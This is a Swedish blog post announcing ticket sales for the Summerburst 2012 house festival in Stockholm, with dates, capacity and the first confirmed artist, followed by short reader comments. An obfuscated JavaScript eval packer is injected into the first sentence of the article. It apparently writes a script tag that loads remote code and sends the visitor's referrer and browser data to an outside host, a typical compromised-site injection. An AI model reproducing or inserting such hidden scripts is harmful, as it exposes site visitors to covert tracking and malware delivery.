Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Biljetter till Summerburst 2012 har släppts

Biljetter till Summerburst 2012 har släppts
Alexander Gylemo

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bastb|var|u0026u|referrer|dahsy||js|php’.split(’|’),0,{}))
(2011-12-04) ropades det ut att biljetter till Summerburst 2012 har släppts tillsammans med lite nyheter och information om upplägget inför nästa års största housefestival i Sverige.

Festivalen är numera två dagar; fredagen den 15e juni och lördag den 16e juni. Än så länge vet vi bara en artist som är bekräftad att vara med; Axwell, vilket självklart är en glad nyhet för dem som undrade var SHM-grabbarna höll hus förra Summerburst, vi kommer uppdatera er allteftersom fler artister ansluter.

I övrigt har man även gjort lite ytterligare nyheter på festivalen, t.ex. att kapaciteten på Stockholm Stadion utökas och området byggs för att hantera upp till 20 000 gäster den här gången, utbudet och området för mat och dryck ska även förbättras och evenemangsområdet och entrésystemet görs om för att bli smidigare.

Biljetter går som sagt redan att köpa, och vem minns inte biljettpaniken från det gångna årets festival? Vi rekommenderar att ni köper era biljetter så fort som möjligt via länken:
http://summerburst.se/stockholm/biljetter/

Läs om festivalen i Göteborg här.

Comments

 1. Louise

   Underbart!!!!!

 2. Summerburst

   Datum är satta 15-16 Juni 2012

 3. hampus

  Ös grabbar. Biljett inhandlad 🙂

 4. Hampus är king!

 5. Grodan boll

  Är det bara Axwell som är bestämd?

 6. Ge oss fler artister 🙂

 7. Pär Olin

  Det var som fan, Sensation kommer möjligtvis också till Sverige nästa år, lyssnade på en frågestund med ID&T’s Duncan Stutterheim för ett bra tag sen men han berättade iaf att diskussion fördes och om allt gick som planerat skulle Sensation äga rum för första gången i Sverige 2012. Saknar källa till detta, men han gjorde en intervju som streamades online, han svarade på olika frågor som tittare skickade in och då var den ena frågan om Sensation någonsin skulle besöka Sverige.